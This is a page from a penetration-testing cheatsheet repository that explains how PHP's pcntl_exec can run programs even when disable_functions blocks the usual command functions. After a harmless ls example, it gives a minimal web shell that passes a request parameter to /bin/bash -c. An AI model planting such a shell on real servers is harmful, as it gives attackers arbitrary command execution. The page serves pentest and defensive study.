daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

disable-functions-bypass-php-4-greater-than-4-2-0-php-5-pcntl-exec.md (2384B)


      1 ---
      2 title: "PHP pcntlexec Command Execution"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # PHP `pcntl_exec` Command Execution
     14 
     15 If the PCNTL extension is loaded and `pcntl_exec` is not itself disabled, the function can start an executable even when more familiar command-execution functions are listed in `disable_functions`. `pcntl_exec` replaces the current process; it does not create a child process, and its arguments must be supplied as an array.<sup>[[1]](#references)</sup>
     16 
     17 The following minimal example executes `ls -l /var/tmp`. It is adapted from an older `disable_functions` bypass demonstration.<sup>[[2]](#references)</sup>
     18 
     19 ```php
     20 <?php
     21 $program = '/bin/ls';
     22 $arguments = ['-l', '/var/tmp'];
     23 
     24 if (function_exists('pcntl_exec')) {
     25     pcntl_exec($program, $arguments);
     26 }
     27 
     28 // This line is reached only if pcntl_exec() fails.
     29 echo "pcntl_exec failed\n";
     30 ?>
     31 ```
     32 
     33 This technique is Unix-specific and can terminate or replace a PHP worker process. Use it only in an authorized test environment.<sup>[[1]](#references)</sup>
     34 
     35 For a request-driven lab check, keep the argument as an array; passing a string as the second parameter is invalid. Because `pcntl_exec()` replaces the PHP process, command output is written directly to the current response or process streams rather than returning to PHP:<sup>[[1]](#references)</sup>
     36 
     37 ```php
     38 <?php
     39 if (function_exists('pcntl_exec') && isset($_REQUEST['cmd'])) {
     40     pcntl_exec('/bin/bash', ['-c', $_REQUEST['cmd']]);
     41 }
     42 ?>
     43 ```
     44 
     45 ## References
     46 
     47 - [1] [PHP Manual - `pcntl_exec`](https://www.php.net/manual/en/function.pcntl-exec.php)
     48 - [2] [SafeBuff - `disable_functions` bypass (archived)](https://web.archive.org/web/20170801153107/http://blog.safebuff.com:80/2016/05/06/disable-functions-bypass/)